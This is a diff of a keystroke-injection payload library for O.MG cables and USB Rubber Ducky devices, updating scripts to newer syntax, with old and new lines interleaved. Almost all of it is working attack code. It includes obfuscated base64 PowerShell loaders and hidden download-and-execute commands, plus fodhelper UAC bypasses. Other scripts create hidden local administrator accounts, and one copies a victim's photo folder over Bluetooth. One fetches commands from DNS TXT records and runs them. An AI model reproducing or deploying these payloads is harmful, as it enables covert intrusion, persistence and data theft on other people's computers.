STRINGLN & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
ENTER

23
payloads/library/execution/-OMG-ShortcutJacker/Shortcut-Jacker-Execute.txt
View File

@ -1,15 +1,20 @@
REM Title: Shortcut-Jacker REM_BLOCK
Title: Shortcut-Jacker
Author: I am Jakoby
REM Author: I am Jakoby Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop Target: Windows 10, 11
REM Target: Windows 10, 11 Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <Your Shared link for the intended file>?dl=1; invoke-expression $pl STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #URL?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

39
payloads/library/execution/-OMG-UrAttaControl/UrAttaControl-Execute.txt
View File

@ -1,30 +1,31 @@
REM Title: UrAttaControl REM_BLOCK
Title: UrAttaControl
Author: I am Jakoby
REM Author: I am Jakoby Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. Target: Windows 10, 11
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11 NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable You can use this function I wrote to convert your .ps1 sscripts to Base64
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
END_REM
REM You can use this function I wrote to convert your .ps1 sscripts to Base64 DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 1000 DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT" STRINGLN $url = #URL
SHIFT ENTER STRINGLN $Payload = (Invoke-WebRequest $url'?dl=1').Content
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content STRINGLN ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER STRINGLN exit
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER

99
payloads/library/execution/Add_Local_Admin/payload.txt
View File

@ -1,71 +1,36 @@
REM Title: Add_Local_Admin REM_BLOCK
REM Author: LulzAnarchyAnon Title: Add_Local_Admin
REM Description: Administrator PowerShell is opened, and a script Author: LulzAnarchyAnon
REM runs that adds a Local Admin User. Description: Administrator PowerShell is opened, and a script runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0 Version: 1.0
REM Category: Execution Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI x GUI x
DELAY 500 STRING a
a
DELAY 500
ALT y ALT y
Delay 2000
STRING $Username = "Admin2" STRINGLN $Username = "Admin2"
DELAY 2000 STRINGLN $Password = "password"
ENTER STRINGLN $group = "Administrators"
STRING $Password = "password" STRINGLN $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 2000 STRINGLN $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
ENTER STRINGLN if ($existing -eq $null) {
STRING $group = "Administrators" STRINGLN Write-Host "Creating new local user $Username."
DELAY 2000 STRINGLN & NET USER $Username $Password /add /y /expires:never
ENTER STRINGLN Write-Host "Adding local user $Username to $group."
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" STRINGLN & NET LOCALGROUP $group $Username /add
DELAY 5000 STRINGLN }
ENTER STRINGLN {
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username } STRINGLN Write-Host "Setting password for existing local user $Username."
DELAY 5000 STRINGLN $existing.SetPassword($Password)
ENTER STRINGLN }
STRING if ($existing -eq $null) { STRINGLN Write-Host "Ensuring password for $Username never expires."
DELAY 2000 STRINGLN & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
ENTER STRINGLN exit
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING {
DELAY 2000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
ENTER
STRING }
DELAY 2000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
ENTER
DELAY 1000
STRING exit
DELAY 100
ENTER

34
payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt
View File

@ -1,10 +1,14 @@
REM Title: Admin who never sleeps REM_BLOCK
REM Desc: Adds a local hidden admin user and sets power settings to never sleep. Title: Admin who never sleeps
REM Author: UberGuidoZ Desc: Adds a local hidden admin user and sets power settings to never sleep.
REM Target: Windows (local admin required) Author: UberGuidoZ
Target: Windows (local admin required)
END_REM
DUCKY_LANG US
DELAY 2000
REM Launch admin-level CMD prompt REM Launch admin-level CMD prompt
DELAY 3000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING cmd STRING cmd
@ -17,31 +21,25 @@ ENTER
DELAY 1500 DELAY 1500
REM Create local admin user WinSystem with pass Some-P@ssw0rd REM Create local admin user WinSystem with pass Some-P@ssw0rd
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add STRINGLN net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
ENTER
DELAY 1500 DELAY 1500
REM Set WinSystem user pass to never expire, skip UAC, and hide the user REM Set WinSystem user pass to never expire, skip UAC, and hide the user
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0 STRINGLN wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
ENTER
DELAY 1500 DELAY 1500
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout) REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0 STRINGLN powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0 STRINGLN Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0 STRINGLN powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
REM Set monitor timeouts to avoid noticing system is awake REM Set monitor timeouts to avoid noticing system is awake
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10 STRINGLN powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
ENTER
DELAY 1000 DELAY 1000
REM Exit and enjoy your user whenever! REM Exit and enjoy your user whenever!
EXIT STRINGLN exit

41
payloads/library/execution/Ai-Cable
View File

@ -1,41 +0,0 @@
REM Ai-Cable
REM Version 2.0
REM OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
REM Author: 0iphor13
REM This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
REM Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
DELAY 2000
REM Language only needed if you are not using an US layout
DUCKY_LANG de
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
MOUSE CLICK 1
DELAY 200
CTRL a
DELAY 200
CTRL x
DELAY 200
STRING I will create the payload for you :)
DELAY 3000
CTRL a
DELAY 200
CTRL v
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
ENTER
MOUSE CLICK 1

29
payloads/library/execution/Ai-Cable.txt Normal file
View File

@ -0,0 +1,29 @@
REM_BLOCK
Ai-Cable
Version 2.0
OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
Author: 0iphor13
This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
END_REM
DUCKY_LANG de
DELAY 2000
DEFAULT_DELAY 200
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
MOUSE CLICK 1
CTRL a
CTRL x
STRING I will create the payload for you :)
DELAY 3000
CTRL a
CTRL v
DELAY 1000
REPEAT 3 TAB
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
ENTER
MOUSE CLICK 1

135
payloads/library/execution/Blue_Harvester/payload.txt
View File

@ -1,133 +1,62 @@
REM_BLOCK
Title: Blue_Harvester
Author: LulzAnarchyAnon
REM Title: Blue_Harvester READ BELOW BEFORE EXECUTING PAYLOAD...
REM Author: LulzAnarchyAnon Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened is selected followed by all of the files in the folder being selected, and added to the transfer cue.
The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
Afterwards the selected files are transfered to the attackers device via bluetooth.
I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
NOTE: Make sure your device is Discoverable...
The cursor coordinates x,y on the screen may vary depending on device...
A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or USB Rubber Ducky (YOUR CHOICE)
Target: Windows 10
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
REM READ BELOW BEFORE EXECUTING PAYLOAD... DELAY 2000
DEFAULT_DELAY 500
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1 REM STAGE 1
GUI GUI
DELAY 50 STRINGLN fsquirt
STRING fsquirt
DELAY 200
ENTER
DELAY 500
SPACE SPACE
DELAY 500
REM STAGE 2 REM STAGE 2
k STRING k
DELAY 500
ENTER ENTER
DELAY 500
SPACE SPACE
DELAY 500 REPEAT 8 TAB
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
DELAY 500
CTRL a CTRL a
DELAY 500
ENTER ENTER
DELAY 500
TAB TAB
DELAY 500
ENTER ENTER
REM STAGE 3 REM STAGE 3
GUI GUI
DELAY 50 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden STRINGLN Add-Type -AssemblyName System.Windows.Forms
DELAY 1000 STRINGLN $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
ENTER STRINGLN $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 5000 STRINGLN [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
MOUSE CLICK 1 MOUSE CLICK 1
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
ALT SPACE ALT SPACE
DELAY 500 REPEAT 6 DOWNARROW
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER ENTER

15
payloads/library/execution/DNS-TXT-Run/payload.txt
View File

@ -1,4 +1,4 @@
#----------------------------------------------------------------------------------------------------------- REM_BLOCK
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in # Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run. # Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
# This POC will get some commands that will play a message on a victims computer using Windows # This POC will get some commands that will play a message on a victims computer using Windows
@ -9,6 +9,7 @@
# Category: Execution # Category: Execution
# Target: Windows10+ Powershell # Target: Windows10+ Powershell
# Attackmodes: HID # Attackmodes: HID
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
# Quick Guide # Quick Guide
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
@ -37,12 +38,14 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
# In OMG code that would be: # In OMG code that would be:
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
END_REM
DEFINE #URL omg.yourdomain.com
DUCKY_LANG US DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING CMD STRINGLN CMD
ENTER
DELAY 500 DELAY 500
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command - STRINGLN for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" #OMG 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
ENTER
#-----------------------------------------------------------------------------------------------------------

47
payloads/library/execution/FodCable - UAC Bypass/payload.txt
View File

@ -1,46 +1,7 @@
DELAY 500
DUCKY_LANG de DUCKY_LANG de
DELAY 1500 DELAY 2000
GUI r
DELAY 500
STRING powershell
DELAY 250
ENTER
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC GUI r
STRINGLN powershell
DELAY 200 DELAY 200
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA STRINGLN powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIANwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBlADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBCADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
DELAY 200
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
DELAY 200
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
DELAY 200
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
DELAY 200
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
DELAY 200
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
DELAY 200
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
DELAY 200
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
DELAY 200
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
DELAY 200
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
DELAY 200
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
DELAY 200
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
DELAY 200
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
DELAY 200
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
DELAY 200
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
DELAY 200
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
DELAY 200
STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
DELAY 100
ENTER

30
payloads/library/execution/FodCable2 - UAC Bypass/payload.txt
View File

@ -1,22 +1,16 @@
REM FodCableII REM_BLOCK
REM Version 1.0 FodCableII
REM OS: Windows Version 1.0
REM Author: 0iphor13 OS: Windows
REM Requirements: OMG Firmware v.2.5 or higher Author: 0iphor13
Requirements: OMG Firmware v.2.5 or higher
Using FodHelper.exe to bypass UAC and get an elevated shell
END_REM
REM Using FodHelper.exe to bypass UAC and get an elevated shell
DELAY 500
DUCKY_LANG de DUCKY_LANG de
DELAY 1500 DELAY 2000
GUI r GUI r
STRINGLN powershell -NoP -NonI
DELAY 500 DELAY 500
